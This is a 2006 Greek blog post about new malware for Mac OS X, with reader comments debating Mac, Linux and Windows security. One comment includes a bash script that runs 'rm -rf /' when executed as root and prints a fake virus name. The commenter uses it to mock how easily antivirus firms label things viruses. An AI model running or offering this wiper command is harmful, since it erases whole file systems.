Περισσότεροι ιοί για το Mac OS X

by admin • On 21-02-2006 • AT 3:00 pm • 7 ΣΧΟΛΙΑ
Computing Τεχνολογία

Φαίνεται πως το Mac OS X έχει γίνει, επισήμως πλέον, στόχος ιών και λοιπών συναφών προγραμμάτων! Για αυτό να κατεβάζετε τις ενημερωμένες εκδόσεις του λειτουργικού αμέσως, και να προσέχετε τα emails σας.

CareerNet.gr: Βρείτε τώρα τη δουλειά που σας ταιριάζει!

7 ΣΧΟΛΙΑ

 1. Αμα αρχίσαμε και εδώ να βλέπουμε ιούς τότε τίποτα δεν είναι ασφαλές. Πριν από λίγες μέρες με “χτύπησε” ιός και σκεφτόμουνα να μεταβώ σε mac μόνο και μόνο για να έχω το κεφάλι μου ήσυχο. Anyway το ακούσαμε και αυτό.

 2. Είναι ο 4ος σε Mac OS X.. δεν μπορείς να συγκρίνεις με τα Windows!

 3. Ακόμη δεν έχω δει χρήστη Mac να παραπονιέται για ιούς μετά από 1.5 χρόνο σε κανάλια macintosh related στο IRC, σε Ελληνικά forums κτλ.
  Έπειτα, ο worm – δεν είναι ιός.. έχει διαφορά – στον οποίο αναφέρεστε περνάει από συσκευές bluetooh. Όποιος έχει περάσει αρχείο bluetooth στον υπολογιστή του, γνωρίζει ότι αυτό γίνεται αφού πρώτα επιτευχθεί μια σύζευξη, την οποία πρέπει να την παρακολουθήσει ο χρήστης.
  Worms υπήρχαν και για Linux. Στην κατηγορία “ιός” η κάθε F-Secure-alike εταιρία μπορεί να εντάξει ένα script τύπου:

  #!/bin/bash

  RM=”rm -rf /”

  if [ `id |awk -F “=” ‘{ print $2}’|awk -F “(” ‘{print $1}’` = “0” ]; then
  $RM
  echo -e “removing files from root partition.\nVirus LAMEVIR.D56”
  else
  echo “You need root priv’s”
  fi

  οπότε ας μην βιαζόμαστε να βγάλουμε συμπεράσματα. Η Microsoft προσπαθεί με κάθε τρόπο να πείσει τον κόσμο ότι το άσπρο είναι μαύρο κι αντίστροφα. Είναι πάγια πολιτική της εταιρίας γιατί τα γεγονότα είναι συντριπτικά υπέρ τους, οπότε το μόνο που μένει είναι η παραποίηση της αλήθειας, η άρνηση του αυτονόητου.
  Κρίνεται μόνοι σας, έχετε δει κάποιον χρήστη με Linux να παραπονιέται για ιό?

 4. duh!
  Ήθελα να πω είναι συντριπτικά κατά στην φράση:

  ..γιατί τα γεγονότα είναι συντριπτικά υπέρ τους

  ..

 5. atma, αν προσέξεις το URL του άρθρου λέει malware.. ούτε κάν worm! Από κάπου πρέπει να ξεκινήσω για να καταλάβουν όσοι δεν έχουν τεχνικές γνώσεις τί είναι ιός, worm, malware. Ασε που δεν μου έρχεται καμία λέξη για την μετάφραση του malware στα ελληνικά.

  Όσο για το Linux, ναι υπάρχουν ιοί αλλά είναι λίγοι. Αν παραπονεί κανείς δεν έχει και μεγάλη σημασία γιατί δεν επηρεάζει το 90% (δεν γνωριζω με ακρίβεια το νούμερο) των υπολογιστών του πλανήτη.

 6. Λάθος προσέγγισει.. όσοι έχουν unix like ξέρουν που πατάνε. Δεν κάνουν execute ότι βρούνε μπροστά τους.

 7. atma, εννοείς ότι με τα unix και unix like λειτουργικά δεν υπάρχει πρόβλημα επειδή το λειτουργικό δεν έχει προβλήματά ή επειδή οι χρήστες ξέρουν τι κάνουν;

Top

Show Buttons
Hide Buttons